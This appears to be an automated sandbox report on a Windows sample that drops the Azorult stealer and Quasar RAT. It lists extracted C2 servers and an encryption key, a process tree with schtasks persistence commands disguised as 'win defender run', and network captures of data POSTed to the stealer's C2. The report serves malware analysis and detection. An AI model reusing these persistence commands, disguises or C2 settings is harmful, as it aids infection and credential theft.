Analysis

  • max time kernel
    6s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2025 23:33

General

  • Target

    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe

  • Size

    2.0MB

  • MD5

    b342fc1721147d746388d4bf6c987a04

  • SHA1

    bcb7f37269b927d2607578804be99ce1eb85f72a

  • SHA256

    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28

  • SHA512

    2f64b632fa7b9c11f0cad0920ae348f5967535f91a449b2619641c227ca1e89ed9391c80dd3fe4285ff50978f62b573e1824312fdc3daf53ad20c61b1840dca5

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKY4:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Ya

Malware Config

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Quasar RAT 3 IoCs

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    "C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"
    1⤵
    • Quasar RAT
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4864
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
          PID:3964
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 548
          3⤵
          • Program crash
          PID:4844
      • C:\Users\Admin\AppData\Local\Temp\windef.exe
        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3952
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4048
        • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
          "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2868
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:116
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JyfJAnc31als.bat" "
            4⤵
              PID:1948
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                5⤵
                  PID:2488
                • C:\Windows\SysWOW64\PING.EXE
                  ping -n 10 localhost
                  5⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:2320
                • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                  "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                  5⤵
                    PID:4636
                    • C:\Windows\SysWOW64\schtasks.exe
                      "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
                      6⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:4292
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4nTpIhOebLIU.bat" "
                      6⤵
                        PID:4356
                        • C:\Windows\SysWOW64\chcp.com
                          chcp 65001
                          7⤵
                            PID:3032
                          • C:\Windows\SysWOW64\PING.EXE
                            ping -n 10 localhost
                            7⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:1584
                          • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                            "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                            7⤵
                              PID:2172
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 2244
                            6⤵
                            • Program crash
                            PID:3196
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 2276
                        4⤵
                        • Program crash
                        PID:1732
                  • C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                    "C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3800
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                    2⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1428
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4864 -ip 4864
                  1⤵
                    PID:824
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2868 -ip 2868
                    1⤵
                      PID:4616
                    • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                      C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                      1⤵
                        PID:4452
                        • C:\Users\Admin\AppData\Local\Temp\vnc.exe
                          "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
                          2⤵
                            PID:1064
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k
                              3⤵
                                PID:4196
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 520
                                3⤵
                                • Program crash
                                PID:1104
                            • C:\Users\Admin\AppData\Local\Temp\windef.exe
                              "C:\Users\Admin\AppData\Local\Temp\windef.exe"
                              2⤵
                                PID:4612
                              • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                                "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"
                                2⤵
                                  PID:1896
                                • C:\Windows\SysWOW64\schtasks.exe
                                  "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                                  2⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2204
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1064 -ip 1064
                                1⤵
                                  PID:4936
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4636 -ip 4636
                                  1⤵
                                    PID:3908

                                  Network

                                  • flag-us
                                    DNS
                                    0x21.in
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    0x21.in
                                    IN A
                                    Response
                                    0x21.in
                                    IN A
                                    44.221.84.105
                                  • flag-us
                                    POST
                                    http://0x21.in:8000/_az/
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    Remote address:
                                    44.221.84.105:8000
                                    Request
                                    POST /_az/ HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Host: 0x21.in:8000
                                    Content-Length: 99
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Fri, 10 Jan 2025 23:33:05 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: btst=9268163b13c12137f5295a7a3a498b33|181.215.176.83|1736551985|1736551985|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  • flag-us
                                    DNS
                                    0x21.in
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    0x21.in
                                    IN A
                                    Response
                                    0x21.in
                                    IN A
                                    44.221.84.105
                                  • flag-us
                                    POST
                                    http://0x21.in/_az/
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    Remote address:
                                    44.221.84.105:8000
                                    Request
                                    POST /_az/ HTTP/1.0
                                    Host: 0x21.in
                                    Connection: close
                                    User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Content-Length: 99
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Fri, 10 Jan 2025 23:33:06 GMT
                                    Content-Type: text/html
                                    Connection: close
                                    Set-Cookie: btst=b48f76c1694448dbf26c381bee22c954|181.215.176.83|1736551986|1736551986|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    winsock.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
                                    Response
                                    ip-api.com
                                    IN A
                                    208.95.112.1
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/
                                    windef.exe
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/ HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Fri, 10 Jan 2025 23:33:06 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 291
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                  • flag-us
                                    DNS
                                    105.84.221.44.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    105.84.221.44.in-addr.arpa
                                    IN PTR
                                    Response
                                    105.84.221.44.in-addr.arpa
                                    IN PTR
                                    ec2-44-221-84-105 compute-1 amazonawscom
                                  • flag-us
                                    DNS
                                    1.112.95.208.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    1.112.95.208.in-addr.arpa
                                    IN PTR
                                    Response
                                    1.112.95.208.in-addr.arpa
                                    IN PTR
                                    ip-apicom
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/
                                    winsock.exe
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/ HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Fri, 10 Jan 2025 23:33:07 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 291
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 58
                                    X-Rl: 43
                                  • flag-us
                                    DNS
                                    217.106.137.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    217.106.137.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    249.197.17.2.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    249.197.17.2.in-addr.arpa
                                    IN PTR
                                    Response
                                    249.197.17.2.in-addr.arpa
                                    IN PTR
                                    a2-17-197-249deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    14.160.190.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    14.160.190.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    95.221.229.192.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    95.221.229.192.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    154.239.44.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    154.239.44.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    133.211.185.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    133.211.185.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    sockartek.icu
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    sockartek.icu
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    sockartek.icu
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    sockartek.icu
                                    IN A
                                  • flag-us
                                    DNS
                                    50.23.12.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    50.23.12.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    15.164.165.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    15.164.165.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    134.130.81.91.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    134.130.81.91.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/ HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Fri, 10 Jan 2025 23:33:45 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 291
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                  • flag-us
                                    POST
                                    http://0x21.in:8000/_az/
                                    Remote address:
                                    44.221.84.105:8000
                                    Request
                                    POST /_az/ HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Host: 0x21.in:8000
                                    Content-Length: 99
                                    Cache-Control: no-cache
                                    Cookie: snkz=181.215.176.83; btst=9268163b13c12137f5295a7a3a498b33|181.215.176.83|1736551985|1736551985|0|1|0
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Fri, 10 Jan 2025 23:34:04 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: btst=9268163b13c12137f5295a7a3a498b33|181.215.176.83|1736552044|1736551985|29|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  • flag-us
                                    POST
                                    http://0x21.in/_az/
                                    Remote address:
                                    44.221.84.105:8000
                                    Request
                                    POST /_az/ HTTP/1.0
                                    Host: 0x21.in
                                    Connection: close
                                    User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Content-Length: 99
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Fri, 10 Jan 2025 23:34:20 GMT
                                    Content-Type: text/html
                                    Connection: close
                                    Set-Cookie: btst=61f07477a921d9fa17a24c2fbdba4544|181.215.176.83|1736552060|1736552060|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  • flag-us
                                    DNS
                                    sockartek.icu
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    sockartek.icu
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    winsock.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
                                    Response
                                    ip-api.com
                                    IN A
                                    208.95.112.1
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    winsock.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    winsock.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
                                  • 44.221.84.105:8000
                                    http://0x21.in:8000/_az/
                                    http
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    528 B
                                    870 B
                                    6
                                    5

                                    HTTP Request

                                    POST http://0x21.in:8000/_az/

                                    HTTP Response

                                    200
                                  • 44.221.84.105:8000
                                    http://0x21.in/_az/
                                    http
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    471 B
                                    590 B
                                    5
                                    5

                                    HTTP Request

                                    POST http://0x21.in/_az/

                                    HTTP Response

                                    200
                                  • 208.95.112.1:80
                                    http://ip-api.com/json/
                                    http
                                    windef.exe
                                    374 B
                                    560 B
                                    5
                                    2

                                    HTTP Request

                                    GET http://ip-api.com/json/

                                    HTTP Response

                                    200
                                  • 208.95.112.1:80
                                    http://ip-api.com/json/
                                    http
                                    winsock.exe
                                    374 B
                                    560 B
                                    5
                                    2

                                    HTTP Request

                                    GET http://ip-api.com/json/

                                    HTTP Response

                                    200
                                  • 5.8.88.191:443
                                    winsock.exe
                                    260 B
                                    5
                                  • 208.95.112.1:80
                                    http://ip-api.com/json/
                                    http
                                    374 B
                                    560 B
                                    5
                                    2

                                    HTTP Request

                                    GET http://ip-api.com/json/

                                    HTTP Response

                                    200
                                  • 5.8.88.191:443
                                    260 B
                                    5
                                  • 44.221.84.105:8000
                                    http://0x21.in:8000/_az/
                                    http
                                    979 B
                                    2.7kB
                                    13
                                    9

                                    HTTP Request

                                    POST http://0x21.in:8000/_az/

                                    HTTP Response

                                    200
                                  • 44.221.84.105:8000
                                    http://0x21.in/_az/
                                    http
                                    817 B
                                    590 B
                                    12
                                    5

                                    HTTP Request

                                    POST http://0x21.in/_az/

                                    HTTP Response

                                    200
                                  • 208.95.112.1:80
                                    ip-api.com
                                    208 B
                                    4
                                  • 8.8.8.8:53
                                    0x21.in
                                    dns
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    53 B
                                    69 B
                                    1
                                    1

                                    DNS Request

                                    0x21.in

                                    DNS Response

                                    44.221.84.105

                                  • 8.8.8.8:53
                                    0x21.in
                                    dns
                                    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
                                    53 B
                                    69 B
                                    1
                                    1

                                    DNS Request

                                    0x21.in

                                    DNS Response

                                    44.221.84.105

                                  • 8.8.8.8:53
                                    ip-api.com
                                    dns
                                    winsock.exe
                                    56 B
                                    72 B
                                    1
                                    1

                                    DNS Request

                                    ip-api.com

                                    DNS Response

                                    208.95.112.1

                                  • 8.8.8.8:53
                                    105.84.221.44.in-addr.arpa
                                    dns
                                    72 B
                                    127 B
                                    1
                                    1

                                    DNS Request

                                    105.84.221.44.in-addr.arpa

                                  • 8.8.8.8:53
                                    1.112.95.208.in-addr.arpa
                                    dns
                                    71 B
                                    95 B
                                    1
                                    1

                                    DNS Request

                                    1.112.95.208.in-addr.arpa

                                  • 8.8.8.8:53
                                    217.106.137.52.in-addr.arpa
                                    dns
                                    73 B
                                    147 B
                                    1
                                    1

                                    DNS Request

                                    217.106.137.52.in-addr.arpa

                                  • 8.8.8.8:53
                                    249.197.17.2.in-addr.arpa
                                    dns
                                    71 B
                                    135 B
                                    1
                                    1

                                    DNS Request

                                    249.197.17.2.in-addr.arpa

                                  • 8.8.8.8:53
                                    14.160.190.20.in-addr.arpa
                                    dns
                                    72 B
                                    158 B
                                    1
                                    1

                                    DNS Request

                                    14.160.190.20.in-addr.arpa

                                  • 8.8.8.8:53
                                    95.221.229.192.in-addr.arpa
                                    dns
                                    73 B
                                    144 B
                                    1
                                    1

                                    DNS Request

                                    95.221.229.192.in-addr.arpa

                                  • 8.8.8.8:53
                                    154.239.44.20.in-addr.arpa
                                    dns
                                    72 B
                                    158 B
                                    1
                                    1

                                    DNS Request

                                    154.239.44.20.in-addr.arpa

                                  • 8.8.8.8:53
                                    133.211.185.52.in-addr.arpa
                                    dns
                                    73 B
                                    147 B
                                    1
                                    1

                                    DNS Request

                                    133.211.185.52.in-addr.arpa

                                  • 8.8.8.8:53
                                    sockartek.icu
                                    dns
                                    118 B
                                    124 B
                                    2
                                    1

                                    DNS Request

                                    sockartek.icu

                                    DNS Request

                                    sockartek.icu

                                  • 8.8.8.8:53
                                    50.23.12.20.in-addr.arpa
                                    dns
                                    70 B
                                    156 B
                                    1
                                    1

                                    DNS Request

                                    50.23.12.20.in-addr.arpa

                                  • 8.8.8.8:53
                                    15.164.165.52.in-addr.arpa
                                    dns
                                    72 B
                                    146 B
                                    1
                                    1

                                    DNS Request

                                    15.164.165.52.in-addr.arpa

                                  • 8.8.8.8:53
                                    134.130.81.91.in-addr.arpa
                                    dns
                                    72 B
                                    147 B
                                    1
                                    1

                                    DNS Request

                                    134.130.81.91.in-addr.arpa

                                  • 8.8.8.8:53
                                    sockartek.icu
                                    dns
                                    59 B
                                    124 B
                                    1
                                    1

                                    DNS Request

                                    sockartek.icu

                                  • 8.8.8.8:53
                                    ip-api.com
                                    dns
                                    winsock.exe
                                    168 B
                                    72 B
                                    3
                                    1

                                    DNS Request

                                    ip-api.com

                                    DNS Request

                                    ip-api.com

                                    DNS Request

                                    ip-api.com

                                    DNS Response

                                    208.95.112.1

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log

                                    Filesize

                                    1KB

                                    MD5

                                    10eab9c2684febb5327b6976f2047587

                                    SHA1

                                    a12ed54146a7f5c4c580416aecb899549712449e

                                    SHA256

                                    f49dbd55029bfbc15134f7c6a4f967d6c39142c63f2e8f1f8c78fab108a2c928

                                    SHA512

                                    7e5fd90fffae723bd0c662a90e0730b507805f072771ee673d1d8c262dbf60c8a03ba5fe088f699a97c2e886380de158b2ccd59ee62e3d012dd6dd14ea9d0e50

                                  • C:\Users\Admin\AppData\Local\Temp\4nTpIhOebLIU.bat

                                    Filesize

                                    208B

                                    MD5

                                    e6a2a704c2be4772a6eeb272a3ed7ef8

                                    SHA1

                                    cc2c4d76821fe14a2aab0b209d64c67f74e30e6d

                                    SHA256

                                    3972a3e8cfe0c149a7a933f75e395f8733bbe40169ccdfd9bbace321f0323dc7

                                    SHA512

                                    47127032ebb9fb9194d2a5656eedf9d6bdfe9b1153e5621d42d4f1e471800badba19f0bf2bc02501057074eee37ebf4c4cf8e27b1584fbcf55bec214dc65334a

                                  • C:\Users\Admin\AppData\Local\Temp\JyfJAnc31als.bat

                                    Filesize

                                    208B

                                    MD5

                                    c93ba5136835ed7472f2c306b99693d8

                                    SHA1

                                    15d5fe3de1d3aa40b0e7d4249b2074e759701c90

                                    SHA256

                                    675ecc5f0ab59acf6aa22f1b532a994a2b93158d6975283cbe8f5d1460c31288

                                    SHA512

                                    0de5825c4a84f86b5fe85ae8e19c418b973fe387e6857f4c2396bed81479f7e22112d499caaeeeb350b939ba9a666e2e28bebac9aaceb127a25f5b740eaf0735

                                  • C:\Users\Admin\AppData\Local\Temp\vnc.exe

                                    Filesize

                                    405KB

                                    MD5

                                    b8ba87ee4c3fc085a2fed0d839aadce1

                                    SHA1

                                    b3a2e3256406330e8b1779199bb2b9865122d766

                                    SHA256

                                    4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

                                    SHA512

                                    7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

                                  • C:\Users\Admin\AppData\Local\Temp\windef.exe

                                    Filesize

                                    349KB

                                    MD5

                                    b4a202e03d4135484d0e730173abcc72

                                    SHA1

                                    01b30014545ea526c15a60931d676f9392ea0c70

                                    SHA256

                                    7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

                                    SHA512

                                    632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

                                  • C:\Users\Admin\AppData\Roaming\Logs\01-10-2025

                                    Filesize

                                    224B

                                    MD5

                                    97ff40dd3dd21486140519a735a53cf6

                                    SHA1

                                    b2988e1eb94cfbd23f1528952ec8cc5637b320ea

                                    SHA256

                                    ea251c3a701bba984565befd09c8c02011f728aa9ac7b198f86061fb2c355f99

                                    SHA512

                                    5a8627aba01d1c1afd4dec4d6c9a2c34d5c84b6cfab01867087c9239094f079f20e2b08e99ce1d853c39c5a0ee05072e8b97f71495561266a522218f1ca9d0ce

                                  • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe

                                    Filesize

                                    2.0MB

                                    MD5

                                    872aa9ce13088039b7cba9dfbb063b33

                                    SHA1

                                    342e9dd327e9a40d299e2b2e7c22a8b4dff92622

                                    SHA256

                                    8b98bab071c85ac2cf68055075fbfb388cb3ba49b22704cbf71ca4b8cf87490b

                                    SHA512

                                    b955e0f72f85727363ebbfcf2572627cdd1a96bb56570679f6acdf3f45e51dae65b0ecf2d6e399bc5f316773af18f62621895204f9da22e9f6aba86420935fa2

                                  • memory/1896-80-0x0000000000EE0000-0x0000000000F00000-memory.dmp

                                    Filesize

                                    128KB

                                  • memory/1896-74-0x0000000000EE0000-0x0000000000F00000-memory.dmp

                                    Filesize

                                    128KB

                                  • memory/2276-19-0x0000000001470000-0x0000000001471000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/2868-45-0x0000000006560000-0x000000000656A000-memory.dmp

                                    Filesize

                                    40KB

                                  • memory/3800-28-0x0000000000A00000-0x0000000000A20000-memory.dmp

                                    Filesize

                                    128KB

                                  • memory/3800-20-0x0000000000A00000-0x0000000000A20000-memory.dmp

